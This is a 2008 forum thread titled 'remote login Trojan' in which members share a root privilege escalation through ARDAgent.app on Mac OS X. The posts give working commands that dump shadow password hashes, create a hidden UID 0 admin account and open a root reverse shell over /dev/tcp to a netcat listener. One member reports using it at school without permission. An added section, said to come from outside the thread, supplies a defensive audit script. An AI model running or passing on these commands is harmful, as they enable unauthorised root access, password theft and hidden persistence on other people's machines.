remote login Trojan, Trying to make a program that will select remote login.
Jun 14 2008, 12:37 AM - Post #431
Group: Members | Posts: 2192 | Joined: 31-March 08 | Member No.: 11928
Hmm, well, the app names compile for me in Platypus. I just wanted to change the image to something else, and it never shows the image; it just shows it like a preview file.
--------------------
--Free--
"Go get SUM" - Me
"Don't worry, I'll mount her and then fsck her silly" - Lokin
Jun 14 2008, 01:30 AM - Post #432
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
Do you have write access?
Jun 14 2008, 02:13 AM - Post #433
Group: Members | Posts: 2192 | Joined: 31-March 08 | Member No.: 11928
It says I have custom access?
Ugh, wow, my iPod is completely useless till I figure out this Pwnage Tool thing.... Yes, I know this is a completely different thread, but I just thought I would mention that.
Jun 14 2008, 02:13 AM - Post #434
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
Is anyone else able to get 'ARDAgent.app' to execute a 'do shell script' command from Script Editor? This is very strange.
Try this AppleScript command in Script Editor...
CODE:
tell application "ARDAgent.app" to do shell script "id"
Occasionally I have to run it a few times to get it to go; once I had to quit Script Editor and relaunch it before it ran. It's reproducible on a PPC/G4 Tiger/10.4.11 Mac here, and not at all on two others. I'm extremely curious to know if this works for anyone else and, if so, what version of OS X and does your Mac have a PowerPC or Intel processor?
I take that back, I just reproduced it on a PPC/G3 Tiger/10.4.11 as well - at first it did not work, I gave up trying and went to do something else, came back and that machine was asleep - woke it up, clicked run and it worked. Hmm.
This post has been edited by callmenames: Jun 14 2008, 02:28 AM
Jun 14 2008, 02:41 AM - Post #435
Group: Members | Posts: 2192 | Joined: 31-March 08 | Member No.: 11928
I'll try it, but where is the shell script 'id' located, or was it stated in a handler of the AppleScript?
Did I say that right?
Jun 14 2008, 02:42 AM - Post #436
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
Andrew, try...
CODE:
ls -aloR /Volumes/FDSAFA/Treemovie.app
To see what the permissions are... Or
CODE:
chmod -Rf 777 /Volumes/FDSAFA/Treemovie.app
To give read/write/execute permission for all users.
And the AppleScript command is all that's required, just paste it into Script Editor and click run; if you get an error, keep trying it a dozen or so times. 'do shell script' runs a command line, not only a script, but the AppleScript command is 'do shell script'.
Sometimes I get this... [screenshot not preserved]
And sometimes I get this...
CODE:
"uid=0(root) gid=501(G4admin) egid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)"
One time on each of two systems I got uid=0 and euid=501. Needless to say, if I have ARDAgent.app run the reverse shell command (posted in this thread) instead of having System Events run it, it's a root shell. Without a password.
This post has been edited by callmenames: Jun 14 2008, 02:55 AM
Jun 14 2008, 06:41 AM - Post #437
Group: Members | Posts: 112 | Joined: 21-May 07 | Member No.: 8009
CODE:
tell application "ARDAgent.app" to do shell script "id"
Works fine for me! (PPC Leopard.) That's a great vulnerability! I also tested it at my school; it allows me to be admin without a password :-) (My school has Tiger Intel and PPC installed.) But you're right, it doesn't always work, but I just have to wait some seconds.
This post has been edited by Wawl: Jun 14 2008, 06:44 AM
Jun 14 2008, 11:01 AM - Post #438
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
I am flabbergasted as to why a setuid executable owned by root can also execute 'do shell script' commands, but uh... well... happy hacking everybody! :)
Stoopid-easy ARDAgent tricks:
CODE:
tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"
CODE:
set hidden_admin_username to "nobodyd"
set hidden_admin_password to "a secret"
set hidden_admin_password_hash to do shell script "openssl passwd -crypt -salt xx '" & hidden_admin_password & "'"
tell application "ARDAgent" to do shell script "/usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' name '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UniqueID 0; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' PrimaryGroupID 20; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' NFSHomeDirectory /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' home /var/root; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' UserShell /bin/bash; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' RealName ''; /usr/bin/sudo dscl . -append /Groups/admin GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -append /Groups/wheel GroupMembership '" & hidden_admin_username & "'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' naprivs -2147483394; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' authentication_authority 'basic'; /usr/bin/sudo dscl . -create /Users/'" & hidden_admin_username & "' passwd " & hidden_admin_password_hash
This post has been edited by callmenames: Jun 14 2008, 11:08 AM
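Added example (not from the thread or from any of its posters): a POSIX shell audit a defender can run for the two artefacts this post leaves behind, a second UID 0 account created through dscl and the setuid bit on ARDAgent that makes 'do shell script' run as root. The dscl output below is a constructed sample, and the ARDAgent binary path is an assumption to verify on the system being checked.

```shell
#!/bin/sh
# Added defender-side audit (not from the thread). Two checks for what the
# posts above leave behind: an extra UID 0 account created via dscl, and the
# setuid-root bit on ARDAgent that lets 'do shell script' run as root.

# Usual location of the binary on 10.4/10.5; assumed, verify on your system.
ARDAGENT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# Reads `dscl . -list /Users UniqueID` output (columns: name, uid) on stdin
# and prints every account other than root that has UID 0.
rogue_uid0_accounts() {
    awk '$2 == "0" && $1 != "root" { print $1 }'
}

# Reads `dscl . -read /Groups/admin GroupMembership` output on stdin and
# prints members missing from the space-separated allowlist in $1.
unexpected_admins() {
    allow=" $1 "
    sed -n 's/^GroupMembership: *//p' | tr ' ' '\n' | while read -r name; do
        [ -n "$name" ] || continue
        case "$allow" in
            *" $name "*) ;;
            *) echo "$name" ;;
        esac
    done
}

# Exit status 0 when FILE carries the setuid bit (mode 4xxx), 1 otherwise.
has_setuid() {
    [ -n "$(find "$1" -maxdepth 0 -perm -4000 2>/dev/null)" ]
}

# Clearing the setuid bit removes the root privilege the posts rely on.
strip_setuid() {
    chmod u-s "$1"
}

# Constructed samples standing in for live dscl output; "nobodyd" is the
# hidden account name from the post above.
SAMPLE_UIDS='_www            70
nobodyd         0
root            0
andrew          501'
SAMPLE_ADMINS='GroupMembership: root andrew nobodyd'
printf '%s\n' "$SAMPLE_UIDS" | rogue_uid0_accounts               # prints: nobodyd
printf '%s\n' "$SAMPLE_ADMINS" | unexpected_admins "root andrew"  # prints: nobodyd
if [ -e "$ARDAGENT" ] && has_setuid "$ARDAGENT"; then
    echo "WARNING: $ARDAGENT is setuid; run strip_setuid on it"
fi
```

On a live Mac, replace the constructed samples by piping the real dscl commands named in the comments into the two functions.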
Jun 14 2008, 11:34 AM - Post #439
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
Or from Terminal instead of Script Editor...
CODE:
osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"'
And to avoid having to run it repeatedly until it works...
CODE:
while :; do hashes=$( osascript -e 'tell application "ARDAgent" to do shell script "cd /var/db/shadow/hash;for hashfile in $(ls -1 /var/db/shadow/hash);do [ ${hashfile} == ${hashfile/state} ] && echo ${hashfile} && cat ${hashfile} && echo; done; exit 0"' ); [ "${hashes}" != "" ] && echo "${hashes}" && break; done
This post has been edited by callmenames: Jun 14 2008, 11:40 AM
Jun 14 2008, 12:23 PM - Post #440
Group: Members | Posts: 1426 | Joined: 14-October 05 | Member No.: 4296
And for a full root reverse shell...
In Terminal on the receiving computer, run netcat to listen for the incoming connection. (Replace the 127.0.0.1 with the actual IP address of your computer, or leave out the '-s 127.0.0.1' entirely. You may have to port-forward in your router and either turn off the OS X firewall or open the port.)
CODE:
nc -s 127.0.0.1 -l -p 6880
The command line for the other computer... (change the 127.0.0.1 to the public IP address of the receiving computer.)
CODE:
osascript -e 'tell application "ARDAgent" to do shell script "exec 6<>/dev/tcp/127.0.0.1/6880; id >&6; cat <&6 | while read input; do $input >&6 2>&6;echo -n \"${USER}@${HOSTNAME} > \" >&6;done"'
This post has been edited by callmenames: Jun 14 2008, 12:24 PM